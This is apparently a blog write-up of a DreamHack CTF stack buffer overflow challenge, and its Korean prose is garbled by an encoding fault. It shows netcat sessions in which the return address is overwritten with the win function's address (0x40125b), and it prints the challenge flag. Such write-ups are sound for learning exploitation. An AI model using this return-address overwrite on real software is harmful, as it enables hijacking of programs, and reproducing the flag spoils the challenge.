๋ฐ์ํ
Buffer Over Flow
- ํ๋ก๊ทธ๋จ์ด ํน์ ํฌ๊ธฐ์ ๋ฉ๋ชจ๋ฆฌ ๋ฒํผ๋ฅผ ๋์ด์ ๋ฐ์ดํฐ๋ฅผ ์ธ ๋ ๋ฐ์
- ์ทจ์ฝ์ ์ ๊ณต๊ฒฉ์๊ฐ ์ ์์ ์ธ ์ฝ๋๋ฅผ ์คํํ๊ฑฐ๋ ์์คํ ์ ๋์์ ๋ณ์กฐํ๋ ๋ฐ ์ด์ฉ๊ฐ๋ฅ
ํ์ด๋ฐฉ๋ฒ
1. name์ ์ ๋ ฅ๋ฐ์์ ์์ฑ
| 7ffdc4799ed0 | 7ffdc4799ed8 | ์ ์ ๋ ฅํ ๋ฐ์ดํฐ๊ฐ stack ์์ ์ ์ฅ๋๊ณ ์๋ ๊ฒ์ ํ์ธํ ์ ์๋ค.
$ nc host3.dreamhack.games 17378
the main function doesn't call win function (0x40125b)!
name: AAAAAAAAA
GM GA GE GV AAAAAAAAA!!
: | addr | value |
| 7ffdc4799ed0 | 4141414141414141 |
| 7ffdc4799ed8 | 400041 |
| 7ffdc4799ee0 | 1 |
| 7ffdc4799ee8 | 7fdb9d4a7d90 |
| 7ffdc4799ef0 | 0 |
| 7ffdc4799ef8 | 401325 |
| 7ffdc4799f00 | 1c4799fe0 |
| 7ffdc4799f08 | 7ffdc4799ff8 |
| 7ffdc4799f10 | 0 |
| 7ffdc4799f18 | 301a9f22753ccd72 |
| 7ffdc4799f20 | 7ffdc4799ff8 |
| 7ffdc4799f28 | 401325 |
| 7ffdc4799f30 | 403e18 |
| 7ffdc4799f38 | 7fdb9d6e4040 |
| 7ffdc4799f40 | cfe117d148decd72 |
| 7ffdc4799f48 | cfada5b68fb6cd72 |
hex value: 0x40125b
2. stack ๊ฐ์ win ํจ์ ์ฃผ์ ๊ฐ์ผ๋ก ๋์ฒด
hex value: 0x40125b
integer count: 4
| addr | value |
| 7fffea7a0fe0 | 40125b |
| 7fffea7a0fe8 | 40125b |
| 7fffea7a0ff0 | 40125b |
| 7fffea7a0ff8 | 40125b |
| 7fffea7a1000 | 0 |
| 7fffea7a1008 | 401325 |
| 7fffea7a1010 | 1ea7a10f0 |
| 7fffea7a1018 | 7fffea7a1108 |
| 7fffea7a1020 | 0 |
| 7fffea7a1028 | 5cb877ac1f1a1be6 |
| 7fffea7a1030 | 7fffea7a1108 |
| 7fffea7a1038 | 401325 |
| 7fffea7a1040 | 403e18 |
| 7fffea7a1048 | 7f467e912040 |
| 7fffea7a1050 | a347a3583f181be6 |
| 7fffea7a1058 | a2348b76a5901be6 |
ํจ์๊ฐ ์ข ๋ฃ๋์์ ๋ ๋์๊ฐ๋ ์ฃผ์ 7fffea7a0ff8 ๋ฅผ win ํจ์ ์ฃผ์๋ก ๋์ฒดํ์ฌ win ํจ์๋ฅผ ํธ์ถํ ์ ์๋ค.
You mustn't be here! It's a vulnerability!
DH{62228e6f20a8b71372f0eceb51537c7f94b8191651ea0636ed4e48857c5b340c}
๋ฐ์ํ
'๐ดโโ ๏ธ CTF ๐ดโโ ๏ธ > ๐งฎ ์ํธํ ๐งฎ' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[Dream Hack - Crypto] likeb64 (0) | 2023.12.09 |
---|---|
[DreamHack - Crypto] uncommon_e (2) | 2023.11.22 |
[Dream Hack - Crypto] RSA-wiener (0) | 2023.09.05 |
[Dream Hack - Crypto] fuzzy flag (0) | 2023.09.04 |
[Dream Hack - Crypto] chinese what? (0) | 2023.09.04 |